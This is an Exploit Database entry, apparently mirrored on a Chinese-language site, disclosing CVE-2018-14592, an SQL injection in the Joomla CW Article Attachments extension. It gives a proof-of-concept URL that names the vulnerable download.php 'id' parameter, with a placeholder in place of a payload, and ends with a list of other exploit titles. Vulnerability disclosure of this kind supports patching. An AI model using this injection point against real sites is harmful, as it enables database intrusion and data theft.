Joomla! Component CW Article Attachments 1.0.6 – ‘id’ SQL Injection

Exploit Database
51 阅读

作者： Haboob Team

日期： 2018-09-24
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/45447/

# Exploit Title: Joomla! CW Article Attachments 1.0.6 - 'id' SQL Injection
# Date: 2018-09-20
# Exploit Author: Haboob Team
# Software Link: https://extensions.joomla.org/extension/cw-article-attachments/
# Version: below < 1.0.6
# CVE : CVE-2018-14592 
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14592

# 1. Description
# The CWJoomla CW Article Attachments PRO extension before 2.0.7 and CW Article Attachments 
# FREE extension before 1.0.6 for Joomla! allow SQL Injection within download.php.
 
# 2. Proof of Concept
 
http://IP-ADDRESS/plugins/content/cwattachments/cwattachments/helpers/download.php?id=INJECTION&sid=0123456789987654321

last Exploits
Joomla! Component CW Article Attachments 1.0.6 – ‘id’ SQL Injection的更多信息

Innovaphone PBX Admin-GUI – Cross-Site Request Forgery：
OpenCats 0.9.4-2 – ‘docx ‘ XML External Entity Injection (XXE)：
Ovidentia Widgets 1.0.61 – Remote Command Execution：
Friends in War Make or Break 1.3 – Authentication Bypass：
phpLiteAdmin 1.9.6 – Multiple Vulnerabilities：
WordPress Theme Workreap 2.2.2 – Unauthenticated Upload Leading to Remote Code Execution：
WordPress Plugin Localize My Post 1.0 – Local File Inclusion：
Nodesforum – ‘_nodesforum_node’ SQL Injection：